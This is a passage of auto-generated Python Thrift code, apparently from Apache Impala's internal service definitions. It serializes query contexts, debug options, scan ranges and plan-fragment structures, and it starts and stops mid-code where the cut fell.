6) oprot.writeString(self.delegated_user) oprot.writeFieldEnd() if self.kudu_latest_observed_ts is not None: oprot.writeFieldBegin('kudu_latest_observed_ts', TType.I64, 7) oprot.writeI64(self.kudu_latest_observed_ts) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.session_id is None: raise TProtocol.TProtocolException(message='Required field session_id is unset!') if self.session_type is None: raise TProtocol.TProtocolException(message='Required field session_type is unset!') if self.database is None: raise TProtocol.TProtocolException(message='Required field database is unset!') if self.connected_user is None: raise TProtocol.TProtocolException(message='Required field connected_user is unset!') if self.network_address is None: raise TProtocol.TProtocolException(message='Required field network_address is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TClientRequest: """ Attributes: - stmt - query_options - redacted_stmt """ thrift_spec = ( None, # 0 (1, TType.STRING, 'stmt', None, None, ), # 1 (2, TType.STRUCT, 'query_options', (TQueryOptions, TQueryOptions.thrift_spec), None, ), # 2 (3, TType.STRING, 'redacted_stmt', None, None, ), # 3 ) def __init__(self, stmt=None, query_options=None, redacted_stmt=None,): self.stmt = stmt self.query_options = query_options self.redacted_stmt = redacted_stmt def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.stmt = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.query_options = TQueryOptions() self.query_options.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.redacted_stmt = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == 
TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TClientRequest') if self.stmt is not None: oprot.writeFieldBegin('stmt', TType.STRING, 1) oprot.writeString(self.stmt) oprot.writeFieldEnd() if self.query_options is not None: oprot.writeFieldBegin('query_options', TType.STRUCT, 2) self.query_options.write(oprot) oprot.writeFieldEnd() if self.redacted_stmt is not None: oprot.writeFieldBegin('redacted_stmt', TType.STRING, 3) oprot.writeString(self.redacted_stmt) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): if self.stmt is None: raise TProtocol.TProtocolException(message='Required field stmt is unset!') if self.query_options is None: raise TProtocol.TProtocolException(message='Required field query_options is unset!') return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TDebugOptions: """ Attributes: - node_id - phase - action - action_param """ thrift_spec = ( None, # 0 (1, TType.I32, 'node_id', None, None, ), # 1 (2, TType.I32, 'phase', None, None, ), # 2 (3, TType.I32, 'action', None, None, ), # 3 (4, TType.STRING, 'action_param', None, None, ), # 4 ) def __init__(self, node_id=None, phase=None, action=None, action_param=None,): self.node_id = node_id self.phase = phase self.action = action self.action_param = action_param def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.I32: self.node_id = iprot.readI32(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.I32: self.phase = iprot.readI32(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.I32: self.action = iprot.readI32(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.action_param = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TDebugOptions') if self.node_id is not None: oprot.writeFieldBegin('node_id', TType.I32, 1) oprot.writeI32(self.node_id) oprot.writeFieldEnd() if self.phase is not None: oprot.writeFieldBegin('phase', TType.I32, 2) oprot.writeI32(self.phase) oprot.writeFieldEnd() if self.action is not None: oprot.writeFieldBegin('action', TType.I32, 3) oprot.writeI32(self.action) oprot.writeFieldEnd() if self.action_param is not None: oprot.writeFieldBegin('action_param', TType.STRING, 4) oprot.writeString(self.action_param) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return 
'%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class TQueryCtx: """ Attributes: - client_request - query_id - session - now_string - pid - coord_address - tables_missing_stats - disable_spilling - parent_query_id - tables_with_corrupt_stats - snapshot_timestamp - desc_tbl - start_unix_millis - disable_codegen_hint - tables_missing_diskids - request_pool - utc_timestamp_string """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'client_request', (TClientRequest, TClientRequest.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2 (3, TType.STRUCT, 'session', (TSessionState, TSessionState.thrift_spec), None, ), # 3 (4, TType.STRING, 'now_string', None, None, ), # 4 (5, TType.I32, 'pid', None, None, ), # 5 (6, TType.STRUCT, 'coord_address', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 6 (7, TType.LIST, 'tables_missing_stats', (TType.STRUCT,(CatalogObjects.ttypes.TTableName, CatalogObjects.ttypes.TTableName.thrift_spec)), None, ), # 7 (8, TType.BOOL, 'disable_spilling', None, None, ), # 8 (9, TType.STRUCT, 'parent_query_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 9 (10, TType.LIST, 'tables_with_corrupt_stats', (TType.STRUCT,(CatalogObjects.ttypes.TTableName, CatalogObjects.ttypes.TTableName.thrift_spec)), None, ), # 10 (11, TType.I64, 'snapshot_timestamp', None, -1, ), # 11 (12, TType.STRUCT, 'desc_tbl', (Descriptors.ttypes.TDescriptorTable, Descriptors.ttypes.TDescriptorTable.thrift_spec), None, ), # 12 (13, TType.I64, 'start_unix_millis', None, None, ), # 13 (14, TType.BOOL, 'disable_codegen_hint', None, False, ), # 14 (15, TType.LIST, 'tables_missing_diskids', (TType.STRUCT,(CatalogObjects.ttypes.TTableName, CatalogObjects.ttypes.TTableName.thrift_spec)), None, ), # 15 (16, TType.STRING, 'request_pool', None, None, ), # 16 (17, TType.STRING, 'utc_timestamp_string', None, None, ), # 17 ) def __init__(self, client_request=None, query_id=None, session=None, now_string=None, pid=None, coord_address=None, tables_missing_stats=None, disable_spilling=None, parent_query_id=None, tables_with_corrupt_stats=None, snapshot_timestamp=thrift_spec[11][4], desc_tbl=None, start_unix_millis=None, disable_codegen_hint=thrift_spec[14][4], tables_missing_diskids=None, request_pool=None, utc_timestamp_string=None,): self.client_request = client_request self.query_id = query_id self.session = session self.now_string = now_string self.pid = pid self.coord_address = coord_address self.tables_missing_stats = tables_missing_stats self.disable_spilling = disable_spilling self.parent_query_id = parent_query_id self.tables_with_corrupt_stats = tables_with_corrupt_stats self.snapshot_timestamp = snapshot_timestamp self.desc_tbl = desc_tbl self.start_unix_millis = start_unix_millis self.disable_codegen_hint = disable_codegen_hint self.tables_missing_diskids = tables_missing_diskids self.request_pool = request_pool self.utc_timestamp_string = utc_timestamp_string def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = 
iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.client_request = TClientRequest() self.client_request.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.query_id = Types.ttypes.TUniqueId() self.query_id.read(iprot) else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRUCT: self.session = TSessionState() self.session.read(iprot) else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRING: self.now_string = iprot.readString(); else: iprot.skip(ftype) elif fid == 5: if ftype == TType.I32: self.pid = iprot.readI32(); else: iprot.skip(ftype) elif fid == 6: if ftype == TType.STRUCT: self.coord_address = Types.ttypes.TNetworkAddress() self.coord_address.read(iprot) else: iprot.skip(ftype) elif fid == 7: if ftype == TType.LIST: self.tables_missing_stats = [] (_etype3, _size0) = iprot.readListBegin() for _i4 in xrange(_size0): _elem5 = CatalogObjects.ttypes.TTableName() _elem5.read(iprot) self.tables_missing_stats.append(_elem5) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 8: if ftype == TType.BOOL: self.disable_spilling = iprot.readBool(); else: iprot.skip(ftype) elif fid == 9: if ftype == TType.STRUCT: self.parent_query_id = Types.ttypes.TUniqueId() self.parent_query_id.read(iprot) else: iprot.skip(ftype) elif fid == 10: if ftype == TType.LIST: self.tables_with_corrupt_stats = [] (_etype9, _size6) = iprot.readListBegin() for _i10 in xrange(_size6): _elem11 = CatalogObjects.ttypes.TTableName() _elem11.read(iprot) self.tables_with_corrupt_stats.append(_elem11) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 11: if ftype == TType.I64: self.snapshot_timestamp = iprot.readI64(); else: iprot.skip(ftype) elif fid == 12: if ftype == TType.STRUCT: self.desc_tbl = Descriptors.ttypes.TDescriptorTable() self.desc_tbl.read(iprot) else: iprot.skip(ftype) elif fid == 13: if ftype == TType.I64: self.start_unix_millis = iprot.readI64(); else: iprot.skip(ftype) elif fid == 14: if ftype == TType.BOOL: self.disable_codegen_hint = iprot.readBool(); else: iprot.skip(ftype) elif fid == 15: if ftype == TType.LIST: self.tables_missing_diskids = [] (_etype15, _size12) = iprot.readListBegin() for _i16 in xrange(_size12): _elem17 = CatalogObjects.ttypes.TTableName() _elem17.read(iprot) self.tables_missing_diskids.append(_elem17) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 16: if ftype == TType.STRING: self.request_pool = iprot.readString(); else: iprot.skip(ftype) elif fid == 17: if ftype == TType.STRING: self.utc_timestamp_string = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('TQueryCtx') if self.client_request is not None: oprot.writeFieldBegin('client_request', TType.STRUCT, 1) self.client_request.write(oprot) oprot.writeFieldEnd() if self.query_id is not None: oprot.writeFieldBegin('query_id', TType.STRUCT, 2) self.query_id.write(oprot) oprot.writeFieldEnd() if self.session is not None: oprot.writeFieldBegin('session', TType.STRUCT, 3) self.session.write(oprot) oprot.writeFieldEnd() if self.now_string is not None: oprot.writeFieldBegin('now_string', TType.STRING, 4) oprot.writeString(self.now_string) oprot.writeFieldEnd() if self.pid is not None: oprot.writeFieldBegin('pid', 
TType.I32, 5)
      oprot.writeI32(self.pid)
      oprot.writeFieldEnd()
    if self.coord_address is not None:
      oprot.writeFieldBegin('coord_address', TType.STRUCT, 6)
      self.coord_address.write(oprot)
      oprot.writeFieldEnd()
    if self.tables_missing_stats is not None:
      oprot.writeFieldBegin('tables_missing_stats', TType.LIST, 7)
      oprot.writeListBegin(TType.STRUCT, len(self.tables_missing_stats))
      for iter18 in self.tables_missing_stats:
        iter18.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.disable_spilling is not None:
      oprot.writeFieldBegin('disable_spilling', TType.BOOL, 8)
      oprot.writeBool(self.disable_spilling)
      oprot.writeFieldEnd()
    if self.parent_query_id is not None:
      oprot.writeFieldBegin('parent_query_id', TType.STRUCT, 9)
      self.parent_query_id.write(oprot)
      oprot.writeFieldEnd()
    if self.tables_with_corrupt_stats is not None:
      oprot.writeFieldBegin('tables_with_corrupt_stats', TType.LIST, 10)
      oprot.writeListBegin(TType.STRUCT, len(self.tables_with_corrupt_stats))
      for iter19 in self.tables_with_corrupt_stats:
        iter19.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.snapshot_timestamp is not None:
      oprot.writeFieldBegin('snapshot_timestamp', TType.I64, 11)
      oprot.writeI64(self.snapshot_timestamp)
      oprot.writeFieldEnd()
    if self.desc_tbl is not None:
      oprot.writeFieldBegin('desc_tbl', TType.STRUCT, 12)
      self.desc_tbl.write(oprot)
      oprot.writeFieldEnd()
    if self.start_unix_millis is not None:
      oprot.writeFieldBegin('start_unix_millis', TType.I64, 13)
      oprot.writeI64(self.start_unix_millis)
      oprot.writeFieldEnd()
    if self.disable_codegen_hint is not None:
      oprot.writeFieldBegin('disable_codegen_hint', TType.BOOL, 14)
      oprot.writeBool(self.disable_codegen_hint)
      oprot.writeFieldEnd()
    if self.tables_missing_diskids is not None:
      oprot.writeFieldBegin('tables_missing_diskids', TType.LIST, 15)
      oprot.writeListBegin(TType.STRUCT, len(self.tables_missing_diskids))
      for iter20 in self.tables_missing_diskids:
        iter20.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.request_pool is not None:
      oprot.writeFieldBegin('request_pool', TType.STRING, 16)
      oprot.writeString(self.request_pool)
      oprot.writeFieldEnd()
    if self.utc_timestamp_string is not None:
      oprot.writeFieldBegin('utc_timestamp_string', TType.STRING, 17)
      oprot.writeString(self.utc_timestamp_string)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.client_request is None:
      raise TProtocol.TProtocolException(message='Required field client_request is unset!')
    if self.query_id is None:
      raise TProtocol.TProtocolException(message='Required field query_id is unset!')
    if self.session is None:
      raise TProtocol.TProtocolException(message='Required field session is unset!')
    if self.now_string is None:
      raise TProtocol.TProtocolException(message='Required field now_string is unset!')
    if self.pid is None:
      raise TProtocol.TProtocolException(message='Required field pid is unset!')
    if self.start_unix_millis is None:
      raise TProtocol.TProtocolException(message='Required field start_unix_millis is unset!')
    if self.utc_timestamp_string is None:
      raise TProtocol.TProtocolException(message='Required field utc_timestamp_string is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TPlanFragmentDestination:
  """
  Attributes:
   - fragment_instance_id
   - server
   - krpc_server
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 1
    (2, TType.STRUCT, 'server', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 2
    (3, TType.STRUCT, 'krpc_server', (Types.ttypes.TNetworkAddress, Types.ttypes.TNetworkAddress.thrift_spec), None, ), # 3
  )

  def __init__(self, fragment_instance_id=None, server=None, krpc_server=None,):
    self.fragment_instance_id = fragment_instance_id
    self.server = server
    self.krpc_server = krpc_server

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.fragment_instance_id = Types.ttypes.TUniqueId()
          self.fragment_instance_id.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.server = Types.ttypes.TNetworkAddress()
          self.server.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.STRUCT:
          self.krpc_server = Types.ttypes.TNetworkAddress()
          self.krpc_server.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPlanFragmentDestination')
    if self.fragment_instance_id is not None:
      oprot.writeFieldBegin('fragment_instance_id', TType.STRUCT, 1)
      self.fragment_instance_id.write(oprot)
      oprot.writeFieldEnd()
    if self.server is not None:
      oprot.writeFieldBegin('server', TType.STRUCT, 2)
      self.server.write(oprot)
      oprot.writeFieldEnd()
    if self.krpc_server is not None:
      oprot.writeFieldBegin('krpc_server', TType.STRUCT, 3)
      self.krpc_server.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.fragment_instance_id is None:
      raise TProtocol.TProtocolException(message='Required field fragment_instance_id is unset!')
    if self.server is None:
      raise TProtocol.TProtocolException(message='Required field server is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
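# Illustrative sketch (not part of the generated interface): a minimal
# binary-protocol round trip for TPlanFragmentDestination, using the thrift
# runtime modules this file already imports (TTransport, TBinaryProtocol).
# The hi/lo and hostname/port constructor fields are assumed from
# Types.thrift, and the host name and port below are invented values.
def _example_destination_round_trip():
  dest = TPlanFragmentDestination(
      fragment_instance_id=Types.ttypes.TUniqueId(hi=1, lo=2),
      server=Types.ttypes.TNetworkAddress(hostname='impalad-1', port=22000))
  dest.validate()  # raises TProtocolException if a required field is unset
  buf = TTransport.TMemoryBuffer()
  dest.write(TBinaryProtocol.TBinaryProtocol(buf))
  decoded = TPlanFragmentDestination()
  decoded.read(TBinaryProtocol.TBinaryProtocol(TTransport.TMemoryBuffer(buf.getvalue())))
  assert decoded == dest  # __eq__ compares the full attribute dict
  return decoded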
class TPlanFragmentCtx:
  """
  Attributes:
   - fragment
   - destinations
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'fragment', (Planner.ttypes.TPlanFragment, Planner.ttypes.TPlanFragment.thrift_spec), None, ), # 1
    (2, TType.LIST, 'destinations', (TType.STRUCT,(TPlanFragmentDestination, TPlanFragmentDestination.thrift_spec)), None, ), # 2
  )

  def __init__(self, fragment=None, destinations=None,):
    self.fragment = fragment
    self.destinations = destinations

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.fragment = Planner.ttypes.TPlanFragment()
          self.fragment.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.LIST:
          self.destinations = []
          (_etype24, _size21) = iprot.readListBegin()
          for _i25 in xrange(_size21):
            _elem26 = TPlanFragmentDestination()
            _elem26.read(iprot)
            self.destinations.append(_elem26)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPlanFragmentCtx')
    if self.fragment is not None:
      oprot.writeFieldBegin('fragment', TType.STRUCT, 1)
      self.fragment.write(oprot)
      oprot.writeFieldEnd()
    if self.destinations is not None:
      oprot.writeFieldBegin('destinations', TType.LIST, 2)
      oprot.writeListBegin(TType.STRUCT, len(self.destinations))
      for iter27 in self.destinations:
        iter27.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.fragment is None:
      raise TProtocol.TProtocolException(message='Required field fragment is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TScanRangeParams:
  """
  Attributes:
   - scan_range
   - volume_id
   - is_cached
   - is_remote
  """

  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'scan_range', (PlanNodes.ttypes.TScanRange, PlanNodes.ttypes.TScanRange.thrift_spec), None, ), # 1
    (2, TType.I32, 'volume_id', None, -1, ), # 2
    (3, TType.BOOL, 'is_cached', None, False, ), # 3
    (4, TType.BOOL, 'is_remote', None, None, ), # 4
  )

  def __init__(self, scan_range=None, volume_id=thrift_spec[2][4], is_cached=thrift_spec[3][4], is_remote=None,):
    self.scan_range = scan_range
    self.volume_id = volume_id
    self.is_cached = is_cached
    self.is_remote = is_remote

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.scan_range = PlanNodes.ttypes.TScanRange()
          self.scan_range.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I32:
          self.volume_id = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.BOOL:
          self.is_cached = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.BOOL:
          self.is_remote = iprot.readBool();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TScanRangeParams')
    if self.scan_range is not None:
      oprot.writeFieldBegin('scan_range', TType.STRUCT, 1)
      self.scan_range.write(oprot)
      oprot.writeFieldEnd()
    if self.volume_id is not None:
      oprot.writeFieldBegin('volume_id', TType.I32, 2)
      oprot.writeI32(self.volume_id)
      oprot.writeFieldEnd()
    if self.is_cached is not None:
      oprot.writeFieldBegin('is_cached', TType.BOOL, 3)
      oprot.writeBool(self.is_cached)
      oprot.writeFieldEnd()
    if self.is_remote is not None:
      oprot.writeFieldBegin('is_remote', TType.BOOL, 4)
      oprot.writeBool(self.is_remote)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    if self.scan_range is None:
      raise TProtocol.TProtocolException(message='Required field scan_range is unset!')
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)

class TPlanFragmentInstanceCtx:
  """
  Attributes:
   - fragment_idx
   - fragment_instance_id
   - per_fragment_instance_idx
   - per_node_scan_ranges
   - per_exch_num_senders
   - sender_id
   - debug_options
  """

  thrift_spec = (
    None, # 0
    (1, TType.I32, 'fragment_idx', None, None, ), # 1
    (2, TType.STRUCT, 'fragment_instance_id', (Types.ttypes.TUniqueId, Types.ttypes.TUniqueId.thrift_spec), None, ), # 2
    (3, TType.I32, 'per_fragment_instance_idx', None, None, ), # 3
    (4, TType.MAP, 'per_node_scan_ranges', (TType.I32,None,TType.LIST,(TType.STRUCT,(TScanRangeParams, TScanRangeParams.thrift_spec))), None, ), # 4
    (5, TType.MAP, 'per_exch_num_senders', (TType.I32,None,TType.I32,None), None, ), # 5
    (6, TType.I32, 'sender_id', None, None, ), # 6
    (7, TType.STRUCT, 'debug_options', (TDebugOptions, TDebugOptions.thrift_spec), None, ), # 7
  )

  def __init__(self, fragment_idx=None, fragment_instance_id=None, per_fragment_instance_idx=None, per_node_scan_ranges=None, per_exch_num_senders=None, sender_id=None, debug_options=None,):
    self.fragment_idx = fragment_idx
    self.fragment_instance_id = fragment_instance_id
    self.per_fragment_instance_idx = per_fragment_instance_idx
    self.per_node_scan_ranges = per_node_scan_ranges
    self.per_exch_num_senders = per_exch_num_senders
    self.sender_id = sender_id
    self.debug_options = debug_options

  def read(self, iprot):
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.I32:
          self.fragment_idx = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRUCT:
          self.fragment_instance_id = Types.ttypes.TUniqueId()
          self.fragment_instance_id.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I32:
          self.per_fragment_instance_idx = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 4:
        if ftype == TType.MAP:
          self.per_node_scan_ranges = {}
          (_ktype29, _vtype30, _size28 ) = iprot.readMapBegin()
          for _i32 in xrange(_size28):
            _key33 = iprot.readI32();
            _val34 = []
            (_etype38, _size35) = iprot.readListBegin()
            for _i39 in xrange(_size35):
              _elem40 = TScanRangeParams()
              _elem40.read(iprot)
              _val34.append(_elem40)
            iprot.readListEnd()
            self.per_node_scan_ranges[_key33] = _val34
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 5:
        if ftype == TType.MAP:
          self.per_exch_num_senders = {}
          (_ktype42, _vtype43, _size41 ) = iprot.readMapBegin()
          for _i45 in xrange(_size41):
            _key46 = iprot.readI32();
            _val47 = iprot.readI32();
            self.per_exch_num_senders[_key46] = _val47
          iprot.readMapEnd()
        else:
          iprot.skip(ftype)
      elif fid == 6:
        if ftype == TType.I32:
          self.sender_id = iprot.readI32();
        else:
          iprot.skip(ftype)
      elif fid == 7:
        if ftype == TType.STRUCT:
          self.debug_options = TDebugOptions()
          self.debug_options.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('TPlanFragmentInstanceCtx')
    if self.fragment_idx is not None:
      oprot.writeFieldBegin('fragment_idx', TType.I32, 1)
      oprot.writeI32(self.fragment_idx)
      oprot.writeFieldEnd()
    if self.fragment_instance_id is not None:
      oprot.writeFieldBegin('fragment_instance_id', TType.STRUCT, 2)
      self.fragment_instance_id.write(oprot)
      oprot.writeFieldEnd()
    if self.per_fragment_instance_idx is not None:
      oprot.writeFieldBegin('per_fragment_instance_idx', TType.I32, 3)
      oprot.writeI32(self.per_fragment_instance_idx)
      oprot.writeFieldEnd()
    if self.per_node_scan_ranges is not None:
      oprot.writeFieldBegin('per_node_scan_ranges', TType.MAP, 4)
      oprot.writeMapBegin(TType.I32, TType.LIST, len(self.per_node_scan_ranges))
      for kiter48,viter49 in self.per_node_scan_ranges.items():
        oprot.writeI32(kiter48)
        oprot.writeListBegin(TType.STRUCT, len(viter49))
        for iter50 in viter49:
          iter50.write(oprot)
        oprot.writeListEnd()
      oprot.writeMapEnd()
      oprot.writeFieldEnd()
    if self.per_exch_num_senders is not None:
      oprot.writeFieldBegin('per_exch_num_senders', TType.MAP, 5)
      oprot.writeMapBegin(TType.I32, TType.I32, len(self.per_exch_num_senders))
      for kiter51,viter52 in self.per_exch_num_senders.items():
        oprot.writeI32(kiter51)
        oprot.writeI32(viter52)
      oprot.writeMapEnd()
